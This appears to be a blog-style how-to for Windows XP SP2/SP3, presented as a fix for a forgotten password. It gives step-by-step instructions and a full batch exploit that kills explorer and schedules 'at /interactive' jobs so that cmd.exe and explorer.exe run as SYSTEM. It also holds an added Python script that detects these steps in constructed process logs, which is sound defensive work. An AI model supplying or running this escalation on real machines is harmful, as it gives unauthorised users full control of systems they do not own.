Solution for a forgotten Windows XP password

For teaching and research purposes only; you bear the consequences yourself!
!! USE AT YOUR OWN RISK !!
!! ONLY FOR EDUCATIONAL PURPOSE !!

Introduction

Obtains SYSTEM privileges. Tested and confirmed working.

  1. Log in to the Guest account
    If there is not even a Guest account, this method does not apply; in that case, boot a portable system from a CD and modify the password file instead.

  2. Kill the explorer process (the loop keeps killing it so that it does not come back):

:l
tskill explorer
goto l
  3. Create a scheduled task that runs explorer shortly afterwards:
at T /interactive explorer.exe

T stands for a time a short while in the future (the current time can be obtained with time.exe).

Once explorer.exe starts again, the currently logged-on account becomes SYSTEM.

After a reboot, everything returns to its original state.
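From a defender's point of view, the sequence above leaves a recognisable trace in process-creation telemetry: explorer being killed by a low-privileged user, at.exe being invoked with /interactive, and explorer.exe subsequently running as SYSTEM. The following Python script is an added example (not code from the original article) that parses a small set of constructed, hypothetical process-creation log lines and flags those indicators; the log format, user names and timestamps are invented for illustration.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample process-creation records in a hypothetical "key=value" format.
# They are not real telemetry; they only model the sequence described in the article.
SAMPLE_LOG = """\
2024-01-01T13:36:50 user=Guest image=C:\\WINDOWS\\system32\\tskill.exe cmdline="tskill explorer"
2024-01-01T13:36:51 user=Guest image=C:\\WINDOWS\\system32\\at.exe cmdline="at 13:37 /interactive cmd.exe"
2024-01-01T13:36:52 user=Guest image=C:\\WINDOWS\\system32\\at.exe cmdline="at 13:37 /interactive explorer.exe"
2024-01-01T13:37:00 user=SYSTEM image=C:\\WINDOWS\\explorer.exe cmdline="explorer.exe"
2024-01-01T14:00:00 user=Alice image=C:\\WINDOWS\\system32\\at.exe cmdline="at 18:00 backup.cmd"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"$'
)


@dataclass
class Event:
    ts: datetime
    user: str
    image: str      # full image path, lower-cased
    cmdline: str


def parse_log(text):
    """Parse the constructed log format into Event objects; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append(Event(datetime.fromisoformat(m["ts"]),
                            m["user"], m["image"].lower(), m["cmdline"]))
    return events


def _basename(image):
    return image.rsplit("\\", 1)[-1]


def detect(events, window=timedelta(minutes=2)):
    """Return (indicator, user, cmdline) tuples for the three indicators of the technique.

    interactive_at_job   - at.exe invoked with /interactive (the task runs as SYSTEM)
    explorer_as_system   - explorer.exe running under the SYSTEM account
    explorer_kill_then_at- explorer killed and at.exe used by the same user within `window`
    """
    findings = []
    for i, ev in enumerate(events):
        name = _basename(ev.image)
        if name == "at.exe" and "/interactive" in ev.cmdline.lower():
            findings.append(("interactive_at_job", ev.user, ev.cmdline))
        if name == "explorer.exe" and ev.user.upper() == "SYSTEM":
            findings.append(("explorer_as_system", ev.user, ev.cmdline))
        if name == "tskill.exe" and "explorer" in ev.cmdline.lower():
            # Correlate: the same user scheduling a job shortly after killing explorer.
            for later in events[i + 1:]:
                if later.ts - ev.ts > window:
                    break
                if _basename(later.image) == "at.exe" and later.user == ev.user:
                    findings.append(("explorer_kill_then_at", ev.user, later.cmdline))
                    break
    return findings


if __name__ == "__main__":
    for indicator, user, cmdline in detect(parse_log(SAMPLE_LOG)):
        print(f"{indicator:22s} user={user:7s} cmdline={cmdline!r}")
```

The ordinary scheduled job by Alice (no /interactive) produces no finding, which keeps the rule from firing on legitimate use of at.exe; on the constructed sample the other four records produce one finding each.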

Demo

@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
rem Save the current clock so it can be restored at the end
rem (the original used "start time /T > time.txt", which opens a new window
rem instead of redirecting the output; plain "time /T" writes the file).
time /T > time.txt
rem Kill the current user's explorer shell
tskill explorer
rem Set the clock to one second before the scheduled time so the jobs fire almost immediately
time 13:36:59 > nul
rem Schedule interactive jobs; on XP the Task Scheduler runs them as SYSTEM.
rem The block is repeated several times in the original, as shown here.
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y

rem Restore the saved clock
echo [*] Backup time
time < time.txt
Original article: https://www.cnblogs.com/jt2001/p/microsoft-winxp-sp2sp3-local-system-privilege-escalation-exploit.html